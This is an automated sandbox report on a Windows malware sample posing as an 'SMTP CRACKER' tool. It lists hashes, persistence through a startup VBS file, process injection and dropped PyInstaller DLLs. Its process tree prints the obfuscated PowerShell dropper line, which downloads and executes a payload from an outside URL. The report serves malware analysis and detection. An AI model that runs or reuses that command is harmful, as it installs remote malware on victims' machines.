2917d37a1531a370ed83705fac885ab8aa568886a326cf6233073436bdd2585e

Analysis

max time kernel
120s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 00:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe
Size

6.1MB
MD5

5f9e61796a21e65f9a03f92ee6a8f6d8
SHA1

d6032fd04db0fbb6195b6e8d31491a3fc289f1ce
SHA256

2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba
SHA512

402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb

Score

10^/10

pyinstaller

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://supportnimbuzz.hexat.com/3/Att.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 4664 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

WinUpdat.exeWinUpdat.exe

pid process

4636 WinUpdat.exe
4556 WinUpdat.exe

flow	pid	process
15	4664	powershell.exe

pid	process
4636	WinUpdat.exe
4556	WinUpdat.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdat.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdat.vbs	WScript.exe

Loads dropped DLL 8 IoCs

Processes:

WinUpdat.exe

pid process

4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe
4556 WinUpdat.exe

pid	process
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe
4556	WinUpdat.exe

Detects Pyinstaller 3 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

Processes:

2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4664 powershell.exe
4664 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4664 powershell.exe

pid	process
4664	powershell.exe
4664	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4664	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exeWinUpdat.exeWinUpdat.exeWScript.exe

description	pid	process	target process
PID 2804 wrote to memory of 4636	2804	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe	WinUpdat.exe
PID 2804 wrote to memory of 4636	2804	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe	WinUpdat.exe
PID 4636 wrote to memory of 4556	4636	WinUpdat.exe	WinUpdat.exe
PID 4636 wrote to memory of 4556	4636	WinUpdat.exe	WinUpdat.exe
PID 2804 wrote to memory of 408	2804	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe	WScript.exe
PID 2804 wrote to memory of 408	2804	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe	WScript.exe
PID 2804 wrote to memory of 408	2804	2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe	WScript.exe
PID 4556 wrote to memory of 4624	4556	WinUpdat.exe	cmd.exe
PID 4556 wrote to memory of 4624	4556	WinUpdat.exe	cmd.exe
PID 408 wrote to memory of 4664	408	WScript.exe	powershell.exe
PID 408 wrote to memory of 4664	408	WScript.exe	powershell.exe
PID 408 wrote to memory of 4664	408	WScript.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe
"C:\Users\Admin\AppData\Local\Temp\2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2804

C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4636

C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN
4⤵
PID:4624

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"
2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4904

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
Filesize
5.8MB

MD5
81aabcc46ce7b6f11bb603020aa0b6a6

SHA1
00263d09f97b9be29f09c66b19722a70d2aff3a8

SHA256
3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

SHA512
06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
Filesize
5.8MB

MD5
81aabcc46ce7b6f11bb603020aa0b6a6

SHA1
00263d09f97b9be29f09c66b19722a70d2aff3a8

SHA256
3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

SHA512
06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
Filesize
5.8MB

MD5
81aabcc46ce7b6f11bb603020aa0b6a6

SHA1
00263d09f97b9be29f09c66b19722a70d2aff3a8

SHA256
3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

SHA512
06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs
Filesize
545B

MD5
bf83a0622f50dfe26baed65b8fb73a93

SHA1
4dce1e24f1a465b427d3a8afce0c9719ef7b7a73

SHA256
ded94f48e84bf9d99d42fe67fd75ea6971a66b225a429e2c12295e7513ecf894

SHA512
2141e65f84486bc512e36dd5ad54371f286cdb7eb5e91f0e69c7910de4fbd932755e3f422feee54a3d2d3c074433ff9cb1bc4eef6842b5d9b9451bc21c75ff0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\_ctypes.pyd
Filesize
119KB

MD5
f5ec0b24dfc7952241c7a86abfb61455

SHA1
84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

SHA256
6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

SHA512
91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\_hashlib.pyd
Filesize
1.6MB

MD5
c94e5379dc430bc98b676260a929c1c6

SHA1
11305c38d58b104a2bd834925bf44930a41a416c

SHA256
11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

SHA512
d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\_multiprocessing.pyd
Filesize
34KB

MD5
243a85355713e19c26c5f3f27e9876fd

SHA1
059006569bd693285ec0373724d49b23d592b2eb

SHA256
32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

SHA512
ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\_socket.pyd
Filesize
50KB

MD5
542726bb334376b4ee0b20cb19853cbb

SHA1
66f88bffce320371e208b5993313b1d84e234dbf

SHA256
ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

SHA512
3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\_ssl.pyd
Filesize
2.0MB

MD5
1b4639e2970bc4a12e0715f161c26e15

SHA1
69c9f8152410380ae4e2465d1711c6d577f7da96

SHA256
260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

SHA512
2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\python27.dll
Filesize
3.3MB

MD5
3e35352c82fbccda9c372b8443f73e5e

SHA1
a30a055e2e7b12c0a6d56afc1869b3b5283ac889

SHA256
dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

SHA512
ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\python27.dll
Filesize
3.3MB

MD5
3e35352c82fbccda9c372b8443f73e5e

SHA1
a30a055e2e7b12c0a6d56afc1869b3b5283ac889

SHA256
dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

SHA512
ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\select.pyd
Filesize
11KB

MD5
5659b1b9b316b0dd48556293fd2062f2

SHA1
0cb51157ad3655060bc3425174e6feabd8fee07a

SHA256
8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

SHA512
f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46362\unicodedata.pyd
Filesize
676KB

MD5
252a1e38d86c07ac3a476db9117e3453

SHA1
b708dc6b672f85f57e7da7a99ef5682616cca2bf

SHA256
8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

SHA512
aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\_ctypes.pyd
Filesize
119KB

MD5
f5ec0b24dfc7952241c7a86abfb61455

SHA1
84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

SHA256
6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

SHA512
91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\_hashlib.pyd
Filesize
1.6MB

MD5
c94e5379dc430bc98b676260a929c1c6

SHA1
11305c38d58b104a2bd834925bf44930a41a416c

SHA256
11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

SHA512
d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\_multiprocessing.pyd
Filesize
34KB

MD5
243a85355713e19c26c5f3f27e9876fd

SHA1
059006569bd693285ec0373724d49b23d592b2eb

SHA256
32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

SHA512
ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\_socket.pyd
Filesize
50KB

MD5
542726bb334376b4ee0b20cb19853cbb

SHA1
66f88bffce320371e208b5993313b1d84e234dbf

SHA256
ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

SHA512
3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\_ssl.pyd
Filesize
2.0MB

MD5
1b4639e2970bc4a12e0715f161c26e15

SHA1
69c9f8152410380ae4e2465d1711c6d577f7da96

SHA256
260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

SHA512
2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\select.pyd
Filesize
11KB

MD5
5659b1b9b316b0dd48556293fd2062f2

SHA1
0cb51157ad3655060bc3425174e6feabd8fee07a

SHA256
8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

SHA512
f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46~1\unicodedata.pyd
Filesize
676KB

MD5
252a1e38d86c07ac3a476db9117e3453

SHA1
b708dc6b672f85f57e7da7a99ef5682616cca2bf

SHA256
8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

SHA512
aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

Download Submit
memory/408-147-0x0000000000000000-mapping.dmp

Download
memory/4556-133-0x0000000000000000-mapping.dmp

Download
memory/4624-149-0x0000000000000000-mapping.dmp

Download
memory/4636-130-0x0000000000000000-mapping.dmp

Download
memory/4664-150-0x0000000000000000-mapping.dmp

Download
memory/4664-155-0x0000000005540000-0x00000000055A6000-memory.dmp

Filesize
408KB

Download
memory/4664-154-0x0000000005460000-0x00000000054C6000-memory.dmp

Filesize
408KB

Download
memory/4664-153-0x0000000004B70000-0x0000000004B92000-memory.dmp

Filesize
136KB

Download
memory/4664-152-0x0000000004D30000-0x0000000005358000-memory.dmp

Filesize
6.2MB

Download
memory/4664-151-0x0000000000DD0000-0x0000000000E06000-memory.dmp

Filesize
216KB

Download
memory/4664-160-0x0000000005B20000-0x0000000005B3E000-memory.dmp

Filesize
120KB

Download
memory/4664-161-0x0000000005F40000-0x0000000005F84000-memory.dmp

Filesize
272KB

Download
memory/4664-162-0x00000000072C0000-0x000000000793A000-memory.dmp

Filesize
6.5MB

Download
memory/4664-163-0x00000000060F0000-0x000000000610A000-memory.dmp

Filesize
104KB

Download
memory/4664-164-0x0000000007120000-0x0000000007196000-memory.dmp

Filesize
472KB

Download